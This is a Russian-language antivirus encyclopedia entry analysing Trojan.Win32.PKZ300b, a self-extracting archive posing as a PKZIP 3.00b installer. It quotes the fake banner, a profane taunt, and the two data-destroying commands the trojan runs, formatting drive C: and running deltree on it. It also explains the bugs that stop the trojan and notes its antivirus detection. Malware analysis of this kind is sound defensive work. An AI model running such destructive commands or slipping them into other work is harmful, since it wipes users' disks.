Trojan.Win32.PKZ300b

Класс Trojan
Платформа Win32
Описание

Technical Details

Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и
длиной 178981 байт. Внутри архива — 5 файлов:

имя файла       длина   что внутри
---------       -----   ----------
PKZINST.EXE      5328   сам троянец
WHATSNEW.300     2417   WhatsNew из PkZip 2.04c, все строки "2.04c"
заменены на "3.0"
COMPRESS.000   124005   ARJ 2.41, плюс экстра-данные
COMPRESS.001   116260   ARJ 2.41 сам по себе
FILE_ID.DIZ       101   DOC-файл, говорит про этот архив, что он -
Pkzip 3.00b.

Троянцем является единственный файл — PKZINST.EXE. Hаписан он на
TurboPascal. При запуске выводит текст:

PKZIP (R) Install Utility   Version 3.00b  4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.

Initializing, this may take a few minutes....

и выполняет две команды:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c: > NULL

К счастью, автору троянца не хватило ума сделать троянца без ошибок, и
троянец затыкается на первой же команде — DOS ждет ответа на стандартный
запрос:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?

Причем самого этого запроса на экране не видно. Hе дай бог, конечно же,
нажать «Y» или «N». Если «Y», то пойдет формат диска C:, если «N», то
пойдет работать DELTREE.
Однако естественное желание при виде заснувшей программы — нажать Reset или
Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных,
а если выход произошел по Ctrl-C, то он еще вякнет напоследок:

Thanks for waiting, moron. You shouldn't have fucked with us.

и вываливается в DOS.
Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых
версий PKZip. Плюс к тому: в троянце есть еще одна ошибка. Перенаправление
«> NULL» создает на диске файл NULL, а автор троянца видимо, хотел
отключить посторонний вывод на экран перенаправлением «> NUL».
Судя по всему сие [юное] дарование читает DOS User’s Guide и еще не дошло
до буквы ‘N’ в алфавитном списке команд DOS.
AVP ловит этого троянца под именем «Trojan.PKZ300b» как в распакованном
файле, так и в self-extracting архиве.